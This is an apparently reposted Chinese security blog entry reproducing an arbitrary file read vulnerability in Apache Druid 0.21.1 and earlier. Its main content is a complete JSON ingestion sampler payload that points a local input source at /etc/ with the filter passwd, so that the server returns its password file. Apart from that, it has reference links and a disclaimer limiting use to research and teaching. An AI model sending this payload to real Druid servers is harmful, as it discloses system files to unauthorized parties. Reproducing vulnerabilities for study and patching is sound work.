Apache Druid <= 0.21.1
{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}
下载地址:https://druid.apache.org/downloads.htmlhttps://it.ruc.edu.cn/wlaq/4f2734fbb2da4df0aa54cb8d03b7ec45.htmhttps://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247489698&idx=1&sn=a891b69cc646a5e44e3eaa68efad878e
原文始发于微信公众号(Reset安全):Apache Druid任意文件读取漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论